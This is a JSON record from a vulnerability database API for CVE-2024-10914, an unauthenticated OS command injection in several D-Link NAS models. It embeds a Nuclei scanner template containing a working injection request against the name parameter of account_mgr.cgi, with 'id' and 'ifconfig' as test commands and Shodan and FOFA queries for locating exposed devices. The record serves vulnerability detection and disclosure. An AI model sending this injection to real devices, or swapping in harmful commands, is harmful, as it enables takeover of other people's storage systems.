{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-10914/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-10914/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-10914/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-10914/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-10914/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-10914"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-10914"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-10914.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2024-10914\n\ninfo:\n  name: D-Link NAS - Command Injection via Name Parameter\n  author: s4e-io\n  severity: critical\n  description: |\n    A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection.\n  impact: |\n    Unauthenticated attackers can execute arbitrary OS commands via the name parameter, potentially compromising the entire D-Link NAS device.\n  remediation: |\n    Update D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L firmware to versions released after 20241028.\n  reference:\n    - https://github.com/verylazytech/CVE-2024-10914\n    - https://www.usom.gov.tr/bildirim/tr-24-1836\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-10914\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-10914\n    cwe-id: CWE-707\n    epss-score: 0.96284\n    epss-percentile: 0.99878\n    cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: dlink\n    product: dns-320_firmware\n    shodan-query: http.html:\"sharecenter\"\n    fofa-query: body=\"sharecenter\"\n  tags: cve,cve2024,dlink,sharecenter,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1\n        Host: {{Hostname}}\n\n    payloads:\n      command:\n        - \"id\"\n        - \"ifconfig\"\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - \"regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)\"\n          - \"contains_all(body, 'inet addr:', 'Mask:')\"\n        condition: or\n\n      - type: dsl\n        dsl:\n          - 'contains(body, \"Content-type: text/html\")'\n          - \"status_code == 200\"\n        condition: and\n# digest: 490a00463044022031d8d2af3f20bdef9640c42e99cd46522e0e634ada56ba5db316dd88ab4e2ecd0220010f8522762b11444803c89875eb07104491d28a103e117b0751a2a9d943c5ed:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-10914"
}